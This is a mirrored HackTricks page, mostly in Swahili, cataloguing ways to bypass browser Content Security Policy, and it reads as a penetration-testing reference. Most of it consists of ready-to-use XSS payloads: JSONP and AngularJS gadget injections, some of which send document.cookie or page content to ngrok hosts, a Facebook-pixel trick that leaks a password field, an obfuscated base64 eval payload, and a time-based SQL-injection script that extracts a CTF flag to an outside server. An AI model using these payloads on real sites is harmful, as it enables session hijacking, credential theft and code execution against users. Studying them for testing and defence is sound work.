maride/hacktricks

Fork 0

mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00

History

Translator 64ad895e9c Translated ['', 'src/pentesting-web/file-inclusion/lfi2rce-via-php-filte

2025-09-04 01:04:45 +00:00

csp-bypass-self-+-unsafe-inline-with-iframes.md

Translated ['.github/pull_request_template.md', 'src/1911-pentesting-fox

2025-01-03 03:36:40 +00:00

README.md

Translated ['', 'src/pentesting-web/file-inclusion/lfi2rce-via-php-filte

2025-09-04 01:04:45 +00:00

README.md

Content Security Policy (CSP) Bypass

CSP ni nini

Content Security Policy (CSP) inatambuliwa kama teknolojia ya kivinjari, iliyolengwa hasa kuzuia mashambulizi kama cross-site scripting (XSS). Inafanya kazi kwa kuainisha na kubainisha njia na vyanzo ambavyo rasilimali zinaweza kupakiwa kwa usalama na kivinjari. Rasilimali hizi zinajumuisha vipengele mbalimbali kama picha, frames, na JavaScript. Kwa mfano, sera inaweza kuruhusu kupakia na kutekeleza rasilimali kutoka domaini hiyo hiyo (self), ikiwa ni pamoja na rasilimali za inline na utekelezaji wa msimbo wa string kupitia funguo kama eval, setTimeout, au setInterval.

Utekelezaji wa CSP hufanywa kupitia vichwa vya majibu au kwa kuingiza vipengele vya meta kwenye ukurasa wa HTML. Kufuatia sera hii, vivinjari hutekeleza masharti haya kwa nguvu na huzuia mara moja ukiukaji wowote unaogundulika.

Imewekwa kupitia vichwa vya majibu:

Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';

Imetekelezwa kupitia tagi ya meta:

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">

Vichwa

CSP inaweza kutekelezwa au kufuatiliwa kwa kutumia vichwa hivi:

Content-Security-Policy: Inatekeleza CSP; browser inazuia ukiukaji wowote.
Content-Security-Policy-Report-Only: Inatumika kwa ufuatiliaji; inaripoti ukiukaji bila kuzuia. Inafaa kwa upimaji katika mazingira ya kabla ya uzalishaji.

Kufafanua Rasilimali

CSP inapunguza vyanzo vya kupakia maudhui hai na pasivu, ikidhibiti vipengele kama utekelezaji wa JavaScript inline na matumizi ya eval(). Mfano wa sera ni:

default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri /cspreport
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';

Maelekezo

script-src: Inaruhusu vyanzo maalum vya JavaScript, ikijumuisha URLs, scripts za inline, na scripts zinazosababishwa na event handlers au XSLT stylesheets.
default-src: Inaweka sera ya msingi ya kupata rasilimali wakati maelekezo maalum ya fetch hayapo.
child-src: Inabainisha vyanzo vinavyoruhusiwa kwa web workers na yaliyomo ndani ya embedded frames.
connect-src: Inaweka kikomo kwa URLs zinazoweza kupakiwa kwa kutumia interfaces kama fetch, WebSocket, XMLHttpRequest.
frame-src: Inaweka kikomo kwa URLs kwa frames.
frame-ancestors: Inabainisha vyanzo vinavyoweza kuingiza ukurasa wa sasa, inafaa kwa elementi kama <frame>, <iframe>, <object>, <embed>, na <applet>.
img-src: Inafafanua vyanzo vinavyoruhusiwa kwa picha.
font-src: Inabainisha vyanzo halali kwa fonts zinazopakiwa kwa kutumia @font-face.
manifest-src: Inafafanua vyanzo vinavyoruhusiwa vya application manifest files.
media-src: Inafafanua vyanzo vinavyoruhusiwa kwa kupakia vitu vya media.
object-src: Inafafanua vyanzo vinavyoruhusiwa kwa elementi <object>, <embed>, na <applet>.
base-uri: Inabainisha URLs zinazoruhusiwa kwa matumizi ya elementi <base>.
form-action: Inaorodhesha endpoints halali za kuwasilisha forms.
plugin-types: Inakataza mime types ambazo ukurasa unaweza kuwaita.
upgrade-insecure-requests: Inaelekeza browsers kuandika upya URLs za HTTP kuwa HTTPS.
sandbox: Inaweka vikwazo vinavyofanana na attribute ya sandbox ya <iframe>.
report-to: Inabainisha kundi ambalo ripoti itatumwa kwa likitendeka kosa la sera.
worker-src: Inabainisha vyanzo halali kwa Worker, SharedWorker, au ServiceWorker scripts.
prefetch-src: Inabainisha vyanzo halali kwa rasilimali ambazo zitatamuliwa au kufahamishwa kabla.
navigate-to: Inaweka kikomo kwa URLs ambazo hati inaweza kuvinjari kwa njia yoyote (a, form, window.location, window.open, nk.)

Vyanzo

*: Inaruhusu URLs zote isipokuwa zile zenye scheme data:, blob:, filesystem:.
'self': Inaruhusu kupakia kutoka domain ileile.
'data': Inaruhusu rasilimali kupakiwa kupitia data scheme (mfano, picha zilizofichwa kwa Base64).
'none': Inazuia kupakia kutoka kwa chanzo chochote.
'unsafe-eval': Inaruhusu matumizi ya eval() na mbinu zinazofanana, haipendekezwi kwa sababu za usalama.
'unsafe-hashes': Inawezesha event handlers maalum za inline.
'unsafe-inline': Inaruhusu matumizi ya rasilimali za inline kama <script> au <style> za inline, haipendekezwi kwa sababu za usalama.
'nonce': Orodha nyeupe kwa scripts maalum za inline zinazotumia nonce ya cryptographic (nambari inayotumika mara moja).
If you have JS limited execution it's possible to get a used nonce inside the page with doc.defaultView.top.document.querySelector("[nonce]") and then reuse it to load a malicious script (if strict-dynamic is used, any allowed source can load new sources so this isn't needed), like in:

Pakia script ukitumia nonce tena

```html

```

'sha256-<hash>': Inaweka scripts kwenye whitelist zilizo na sha256 hash maalum.
'strict-dynamic': Inaruhusu kupakia scripts kutoka kwa chanzo chochote ikiwa zimewekwa kwenye whitelist kwa kutumia nonce au hash.
'host': Inaelezea host maalum, kama example.com.
https:: Inaruhusu tu URLs zinazotumia HTTPS.
blob:: Inaruhusu resources kupakiwa kutoka Blob URLs (mfano, Blob URLs zilizoundwa kwa JavaScript).
filesystem:: Inaruhusu resources kupakiwa kutoka filesystem.
'report-sample': Inajumuisha sampuli ya code inayokiuka katika ripoti ya ukiukaji (inayosaidia debugging).
'strict-origin': Inafanana na 'self' lakini ina hakikisha ngazi ya usalama ya protocol ya vyanzo inalingana na ile ya hati (tu secure origins zinaweza kupakia resources kutoka secure origins).
'strict-origin-when-cross-origin': Inatuma URLs kamili wakati wa maombi ya same-origin lakini inatuma tu origin wakati ombi ni cross-origin.
'unsafe-allow-redirects': Inaruhusu resources kupakiwa ambazo zitabadilisha mwelekeo mara moja kwenda resource nyingine. Haipendekezwi kwa kuwa inapunguza usalama.

Kanuni za CSP zisizo salama

'unsafe-inline'

Content-Security-Policy: script-src https://google.com 'unsafe-inline';

Payload inayofanya kazi: "/><script>alert(1);</script>

self + 'unsafe-inline' via Iframes

{{#ref}} csp-bypass-self-+-unsafe-inline-with-iframes.md {{#endref}}

'unsafe-eval'

Caution

Hii haifanyi kazi, kwa maelezo zaidi check this.

Content-Security-Policy: script-src https://google.com 'unsafe-eval';

Payload inayofanya kazi:

<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

strict-dynamic

Ikiwa kwa njia yoyote unaweza kusababisha JS iliyoruhusiwa kuunda tag mpya ya script kwenye DOM kwa JS yako, kwa sababu script iliyoruhusiwa inaiunda, basi tag mpya ya script itaruhusiwa kutekelezwa.

Wildcard (*)

Content-Security-Policy: script-src 'self' https://google.com https: data *;

Payload inayofanya kazi:

"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>

Kukosa object-src na default-src

[!CAUTION] > Inaonekana hii haifanyi kazi tena

Content-Security-Policy: script-src 'self' ;

Payloads zinazofanya kazi:

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

Kupakia Faili + 'self'

Content-Security-Policy: script-src 'self';  object-src 'none' ;

Ikiwa unaweza kupakia faili ya JS, unaweza bypass CSP hii:

Working payload:

"/>'><script src="/uploads/picture.png.js"></script>

However, it's highly probable that the server is kukagua faili iliyopakiwa and will only allow you to kupakia aina maalum za faili.

Moreover, even if you could upload a JS code inside a file using an extension accepted by the server (like: script.png) this won't be enough because some servers like apache server select MIME type of the file based on the extension and browsers like Chrome will reject to execute Javascript code inside something that should be an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that Apache doesn't know the .wave extension, therefore it doesn't serve it with a MIME type like audio/*.

From here, if you find a XSS and a file upload, and you manage to find a misinterpreted extension, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot (mfano kadhaa za polyglot hapa).

Form-action

If not possible to inject JS, you could still try to exfiltrate for example credentials injecting a form action (and maybe expecting password managers to auto-fill passwords). You can find an mfano katika ripoti hii. Also, notice that default-src does not cover form actions.

Third Party Endpoints + ('unsafe-eval')

Warning

Kwa baadhi ya payload zifuatazo, unsafe-eval haitahitajika hata.

Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';

Pakia toleo dhaifu la angular na utekeleze JS yoyote:

<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>


"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>


"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>


With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
<iframe/ng-app/ng-csp/srcdoc="
<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
</script>
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>

Payloads zinazotumia Angular + maktaba yenye functions zinazorejesha `window` object (check out this post):

Tip

Chapisho linaonyesha kuwa unaweza kupakia zote maktaba kutoka cdn.cloudflare.com (au repo nyingine yoyote ya JS libraries iliyoruhusiwa), endesha functions zote zilizoongezwa kutoka kila maktaba, na hakiki ni functions gani kutoka maktaba gani zinazorudisha window objekti.

<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
<div ng-app ng-csp>
{{$on.curry.call().alert(1)}}
{{[].empty.call().alert([].empty.call().document.domain)}}
{{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
</div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().alert('xss')}}
</div>


<script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script>
<div ng-app ng-csp>
{{[].erase.call().alert('xss')}}
</div>

Angular XSS kutoka kwa jina la darasa:

<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>

Kutumia vibaya google recaptcha JS code

Kulingana na this CTF writeup unaweza kutumia vibaya https://www.google.com/recaptcha/ ndani ya CSP ili kutekeleza arbitrary JS code ukiepuka CSP:

<div
ng-controller="CarouselController as c"
ng-init="c.init()"
>
&#91[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]]
<div carousel><div slides></div></div>

<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>

Zaidi payloads from this writeup:

<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>

<!-- Trigger alert -->
<img src="x" ng-on-error="$event.target.ownerDocument.defaultView.alert(1)" />

<!-- Reuse nonce -->
<img
src="x"
ng-on-error='
doc=$event.target.ownerDocument;
a=doc.defaultView.top.document.querySelector("[nonce]");
b=doc.createElement("script");
b.src="//example.com/evil.js";
b.nonce=a.nonce; doc.body.appendChild(b)' />

Kutumia vibaya www.google.com kwa open redirect

URL ifuatayo inaelekeza kwa example.com (from here):

https://www.google.com/amp/s/example.com/

Kutumia vibaya *.google.com/script.google.com

Inawezekana kutumia vibaya Google Apps Script ili kupokea taarifa katika ukurasa ndani ya script.google.com. Kama ilivyofanywa katika ripoti hii.

Endpoints za wahusika wa tatu + JSONP

Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';

Matukio kama haya ambapo script-src imewekwa kwa self na kikoa maalum kilicho kwenye orodha nyeupe kinaweza kupitishwa kwa kutumia JSONP. Endpoints za JSONP zinaruhusu njia za callback zisizo salama ambazo zinaweza kumruhusu mshambuliaji kutekeleza XSS, working payload:

"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>

https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>

<script type="text/javascript" crossorigin="anonymous" src="https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(%27KGZ1bmN0aW9uKCl7CiBsZXQgdnIgPSAoKT0%2Be3dpdGgobmV3IHRvcFsnVydbJ2NvbmNhdCddKCdlYicsJ1MnLCdjZycmJidvY2snfHwncGsnLCdldCcpXSgndydbJ2NvbmNhdCddKCdzcycsJzpkZWZkZWYnLCdsaScsJ3ZlY2hhdGknLCduYycsJy4nfHwnOycsJ25ldHdvcmtkZWZjaGF0cGlwZWRlZjAyOWRlZicpWydzcGxpdCddKCdkZWYnKVsnam9pbiddKCIvIikpKShvbm1lc3NhZ2U9KGUpPT5uZXcgRnVuY3Rpb24oYXRvYihlWydkYXRhJ10pKS5jYWxsKGVbJ3RhcmdldCddKSl9O25hdmlnYXRvclsnd2ViZHJpdmVyJ118fChsb2NhdGlvblsnaHJlZiddWydtYXRjaCddKCdjaGVja291dCcpJiZ2cigpKTsKfSkoKQ%3D%3D%27));"></script>

JSONBee ina ready-to-use JSONP endpoints kwa CSP bypass ya tovuti mbalimbali.

Udhaifu uleule utatokea ikiwa trusted endpoint contains an Open Redirect kwa sababu ikiwa initial endpoint imethibitishwa, redirects zinachukuliwa kuwa za kuaminika.

Matumizi Mabaya ya Wahusika wa Tatu

Kama ilivyoelezwa katika following post, kuna domain nyingi za third-party ambazo zinaweza kuruhusiwa mahali fulani katika CSP, na zinaweza kutumiwa vibaya ili exfiltrate data au execute JavaScript code. Baadhi ya third-parties ni:

Chombo	Domain Zinaruhusiwa	Uwezo
Facebook	www.facebook.com, *.facebook.com	Exfil
Hotjar	*.hotjar.com, ask.hotjar.io	Exfil
Jsdelivr	*.jsdelivr.com, cdn.jsdelivr.net	Exec
Amazon CloudFront	*.cloudfront.net	Exfil, Exec
Amazon AWS	*.amazonaws.com	Exfil, Exec
Azure Websites	.azurewebsites.net, .azurestaticapps.net	Exfil, Exec
Salesforce Heroku	*.herokuapp.com	Exfil, Exec
Google Firebase	*.firebaseapp.com	Exfil, Exec

Ikiwa utapata yoyote ya domain zilizo ruhusiwa katika CSP ya lengo lako, kuna uwezekano kwamba unaweza bypass CSP kwa kujisajili kwenye third-party service na, ama exfiltrate data kwa huduma hiyo au execute code.

Kwa mfano, ikiwa utapata CSP ifuatayo:

Content-Security-Policy: default-src 'self’ www.facebook.com;

Content-Security-Policy: connect-src www.facebook.com;

Unapaswa kuwa na uwezo wa exfiltrate data, similarly as it has always be done with Google Analytics/Google Tag Manager. Katika kesi hii, fuata hatua hizi za jumla:

Create a Facebook Developer account hapa.
Create a new "Facebook Login" app and select "Website".
Nenda kwenye "Settings -> Basic" na pata "App ID" yako
Kwenye target site unayotaka ku-exfiltrate data kutoka, unaweza exfiltrate data kwa kutumia moja kwa moja Facebook SDK gadget "fbq" kupitia "customEvent" na data payload.
Nenda kwenye App yako "Event Manager" na chagua application uliyotengeneza (kumbuka event manager inaweza kupatikana katika URL inayofanana na hii: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events
Chagua tab "Test Events" ili kuona events zinazotumwa na "your" web site.

Then, on the victim side, you execute the following code to initialize the Facebook tracking pixel to point to the attacker's Facebook developer account app-id and issue a custom event like this:

fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});

Kuhusu yale mengine saba third-party domains yaliyotajwa katika jedwali lililopita, kuna njia nyingi zaidi unazoweza kuzitumia vibaya. Refer to the previously blog post for additional explanations about other third-party abuses.

Bypass via RPO (Relative Path Overwrite)

Mbali na redirection iliyotajwa hapo juu ili bypass path restrictions, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) ambayo inaweza kutumika kwenye servers fulani.

Kwa mfano, kama CSP inaruhusu path https://example.com/scripts/react/, inaweza kupitishwa kama ifuatavyo:

<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>

The browser will ultimately load https://example.com/scripts/angular/angular.js.

Hii inafanya kazi kwa sababu kwa upande wa kivinjari, unapakia faili yenye jina ..%2fangular%2fangular.js iliyo chini ya https://example.com/scripts/react/, ambayo inakubaliana na CSP.

∑, kivinjari kitabadilisha msimbo huo (decode), na kwa hivyo kitaomba https://example.com/scripts/react/../angular/angular.js, ambayo ni sawa na https://example.com/scripts/angular/angular.js.

Kwa kuitumia utofauti huu wa tafsiri ya URL kati ya kivinjari na server, kanuni za path zinaweza kupitilizwa.

Suluhisho ni kutofanya %2f kama / upande wa server, kuhakikisha tafsiri ndogo kati ya kivinjari na server ili kuepuka tatizo hili.

Online Example: https://jsbin.com/werevijewa/edit?html,output

Utekelezaji wa JS kwenye Iframes

{{#ref}} ../xss-cross-site-scripting/iframes-in-xss-and-csp.md {{#endref}}

Kukosa base-uri

Kama directive ya base-uri haipo unaweza kuitumia vibaya kufanya dangling markup injection.

Zaidi ya hayo, ikiwa ukurasa unapakia script kwa kutumia relative path (kama <script src="/js/app.js">) ukitumia Nonce, unaweza kuitumia vibaya base tag ili kuifanya iload script kutoka seva yako mwenyewe kufanikisha XSS.
Ikiwa ukurasa wenye udhaifu unapakiwa kwa httpS, tumia URL ya httpS katika base.

<base href="https://www.attacker.com/" />

AngularJS matukio

Sera maalum inayojulikana kama Content Security Policy (CSP) inaweza kuzuia matukio ya JavaScript. Hata hivyo, AngularJS inaleta matukio maalum kama mbadala. Katika tukio, AngularJS hutoa kipengele cha kipekee $event, kinachorejea kwenye native browser event object. Kipengele hiki $event kinaweza kutumiwa kuzunguka CSP. Kwa mfano, kwenye Chrome, kitu $event/event kina sifa path, inayoshikilia array ya objects inayohusika katika mnyororo wa utekelezaji wa tukio, ambapo window daima iko mwishoni. Muundo huu ni muhimu kwa sandbox escape tactics.

Kwa kuielekeza array hii kwenye filter ya orderBy, inawezekana kuitereta juu yake, ukitumia kipengele cha mwisho (kitu window) kuanzisha global function kama alert(). Snippet ya code iliyoonyeshwa hapa chini inaelezea mchakato huu:

<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x

Kipande hiki kinaangazia matumizi ya directive ya ng-focus kuzusha tukio, ikitumia $event.path|orderBy kurekebisha array ya path, na kutumia object ya window kutekeleza alert() na hivyo kufichua document.cookie.

Pata bypasses nyingine za Angular katika https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

AngularJS na whitelisted domain

Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;

Sera ya CSP inayoorodhesha domains kwa ajili ya upakiaji wa script katika application ya Angular JS inaweza kupitishwa kupitia kuamshwa kwa callback functions na baadhi ya classes zilizo na udhaifu. Maelezo zaidi juu ya mbinu hii yanaweza kupatikana katika mwongozo wa kina uliopo kwenye git repository.

Working payloads:

<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>

<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">

Other JSONP arbitrary execution endpoints can be found in here (baadhi yao zilitoweka au zilirekebishwa)

Bypass via Redirection

Nini hutokea wakati CSP inakutana na urejeeshaji upande wa server? Ikiwa urejeeshaji unaelekeza kwa origin tofauti ambayo haijaruhusiwa, bado utashindwa.

Hata hivyo, kwa mujibu wa maelezo katika CSP spec 4.2.2.3. Paths and Redirects, ikiwa urejeeshaji unaelekeza kwa njia tofauti, unaweza kupitisha vikwazo vya awali.

Hapa kuna mfano:

<!DOCTYPE html>
<html>
<head>
<meta
http-equiv="Content-Security-Policy"
content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" />
</head>
<body>
<div id="userContent">
<script src="https://https://www.google.com/test"></script>
<script src="https://https://www.google.com/a/test"></script>
<script src="http://localhost:5555/301"></script>
</div>
</body>
</html>

Ikiwa CSP imewekwa kwa https://www.google.com/a/b/c/d, kwa kuwa path inazingatiwa, scripts /test na /a/test zitazuiwa na CSP.

Hata hivyo, http://localhost:5555/301 ita pelekwa upande wa server hadi https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//. Kwa kuwa ni redirection, path haizingatiwi, na script inaweza kupakiwa, hivyo kupitisha kikomo la path.

Kwa redirection hii, hata kama path imeelezewa kikamilifu, bado itapitishwa.

Kwa hiyo, suluhisho bora ni kuhakikisha kwamba tovuti haina open redirect vulnerabilities na kwamba hakuna domains zinazoweza kutumika vibaya katika sheria za CSP.

Bypass CSP kwa dangling markup

Soma jinsi hapa.

'unsafe-inline'; img-src *; via XSS

default-src 'self' 'unsafe-inline'; img-src *;

'unsafe-inline' ina maana kwamba unaweza kutekeleza script yoyote ndani ya code (XSS inaweza kutekeleza code) na img-src * ina maana kwamba unaweza kutumia kwenye ukurasa wa wavuti picha yoyote kutoka kwa rasilimali yoyote.

Unaweza bypass CSP hii kwa exfiltrating data kupitia picha (katika tukio hili XSS inatumia CSRF ambapo ukurasa unaopatikana na bot una SQLi, na kutoa flag kupitia picha):

<script>
fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new
Image().src='http://PLAYER_SERVER/?'+_)
</script>

From: https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle

Unaweza pia kutumia mbiu hii kuweza load javascript code inserted inside an image. Kwa mfano, ikiwa ukurasa unaruhusu kupakia picha kutoka Twitter. Unaweza craft special image, upload yake kwenye Twitter na kutumia "unsafe-inline" ili execute JS code (kama XSS ya kawaida) ambayo itaunda load ya image, extract JS kutoka ndani yake na kuiexecute: https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/

Kwa Service Workers

Service Workers importScripts function haijawekewa kikomo na CSP:

{{#ref}} ../xss-cross-site-scripting/abusing-service-workers.md {{#endref}}

Policy Injection

Utafiti: https://portswigger.net/research/bypassing-csp-with-policy-injection

Chrome

Ikiwa parameter uliotumwa na wewe ime pasted inside ya declaration ya policy, basi unaweza alter policy kwa namna itakayoiweka it useless. Unaweza allow script 'unsafe-inline' kwa mojawapo ya hizi bypasses:

script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'

Kwa sababu directive hii itabadilisha script-src directives zilizopo.
Unaweza kupata mfano hapa: http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E

Edge

Katika Edge ni rahisi zaidi. Ikiwa unaweza kuongeza kwenye CSP tu hivi: ;_ Edge itaiondoa sera nzima.
Example: http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E

img-src *; via XSS (iframe) - Time attack

Notice the lack of the directive 'unsafe-inline'
This time you can make the victim load a page in your control via XSS with a <iframe. This time you are going to make the victim access the page from where you want to extract information (CSRF). You cannot access the content of the page, but if somehow you can control the time the page needs to load you can extract the information you need.

Mara hii flag itatolewa, kila wakati char imegadiriwa kwa usahihi kupitia SQLi response inachukua muda mrefu kutokana na sleep function. Kisha, utaweza kutoa flag:

<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
<iframe name="f" id="g"></iframe> // The bot will load an URL with the payload
<script>
let host = "http://x-oracle-v1.nn9ed.ka0labs.org"
function gen(x) {
x = escape(x.replace(/_/g, "\\_"))
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`
}

function gen2(x) {
x = escape(x)
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`
}

async function query(word, end = false) {
let h = performance.now()
f.location = end ? gen2(word) : gen(word)
await new Promise((r) => {
g.onload = r
})
let diff = performance.now() - h
return diff > 300
}

let alphabet = "_abcdefghijklmnopqrstuvwxyz0123456789".split("")
let postfix = "}"

async function run() {
let prefix = "nn9ed{"
while (true) {
let i = 0
for (i; i < alphabet.length; i++) {
let c = alphabet[i]
let t = await query(prefix + c) // Check what chars returns TRUE or FALSE
console.log(prefix, c, t)
if (t) {
console.log("FOUND!")
prefix += c
break
}
}
if (i == alphabet.length) {
console.log("missing chars")
break
}
let t = await query(prefix + "}", true)
if (t) {
prefix += "}"
break
}
}
new Image().src = "http://PLAYER_SERVER/?" + prefix //Exfiltrate the flag
console.log(prefix)
}

run()
</script>

Kupitia Bookmarklets

Shambulio hili lingehusisha baadhi ya social engineering ambapo mshambuliaji convinces the user to drag and drop a link over the bookmarklet of the browser. Bookmarklet hii ingekuwa na malicious javascript code ambayo, wakati ya drag&dropped or clicked, ingeteuliwa katika muktadha wa dirisha la wavuti la sasa, bypassing CSP and allowing to steal sensitive information kama cookies au tokens.

For more information check the original report here.

CSP bypass by restricting CSP

In this CTF writeup, CSP imevunjwa kwa kuingiza ndani ya iframe iliyokubaliwa CSP kali zaidi ambayo ilizuia kupakia faili maalum ya JS ambayo, kisha, kupitia prototype pollution au dom clobbering iliwezesha abuse a different script to load an arbitrary script.

Unaweza restrict a CSP of an Iframe with the csp attribute:

<iframe
src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]"
csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>

Katika this CTF writeup, ilikuwa inawezekana kupitia HTML injection restrict zaidi CSP, hivyo script iliyokuwa ikizuia CSTI ilizimwa na kwa hiyo vulnerability became exploitable.
CSP inaweza kufanywa kuwa kali zaidi kwa kutumia HTML meta tags na inline scripts zinaweza kuzimwa kwa removing ile entry inayoruhusu nonce zao na enable specific inline script via sha:

<meta
http-equiv="Content-Security-Policy"
content="script-src 'self'
'unsafe-eval' 'strict-dynamic'
'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';" />

JS exfiltration with Content-Security-Policy-Report-Only

Ikiwa unaweza kufanikisha server kujibu na header Content-Security-Policy-Report-Only yenye thamani inayodhibitiwa na wewe (labda kwa sababu ya CRLF), unaweza kuifanya iielekeze kwa server yako, na ukifunga (wrap) JS content unayotaka ku-exfiltrate ndani ya <script>, na kwa kuwa kuna uwezekano mkubwa unsafe-inline haikubaliwi na CSP, hii itasababisha CSP error na sehemu ya script (inayoeleza taarifa nyeti) itatumwa kwa server kupitia Content-Security-Policy-Report-Only.

Kwa mfano check this CTF writeup.

CVE-2020-6519

document.querySelector("DIV").innerHTML =
'<iframe src=\'javascript:var s = document.createElement("script");s.src = "https://pastebin.com/raw/dw5cWGK6";document.body.appendChild(s);\'></iframe>'

Leaking Information with CSP and Iframe

An iframe inaundwa inayobofya kwenye URL (tuseme https://example.redirect.com) ambayo imekuruhusiwa na CSP.
URL hii kisha redirects kwenda kwenye URL ya siri (mfano, https://usersecret.example2.com) ambayo haijaruhusiwa na CSP.
Kwa kusikiliza tukio la securitypolicyviolation, mtu anaweza kunasa property ya blockedURI. Property hii inaonyesha domain ya URI iliyozuiliwa, ikileak domain ya siri ambayo URL ya awali ilielekezwa.

Inavutia kutambua kuwa browsers kama Chrome na Firefox zina tabia tofauti katika kushughulikia iframe kuhusiana na CSP, jambo ambalo linaweza kusababisha leak ya taarifa nyeti kutokana na undefined behavior.

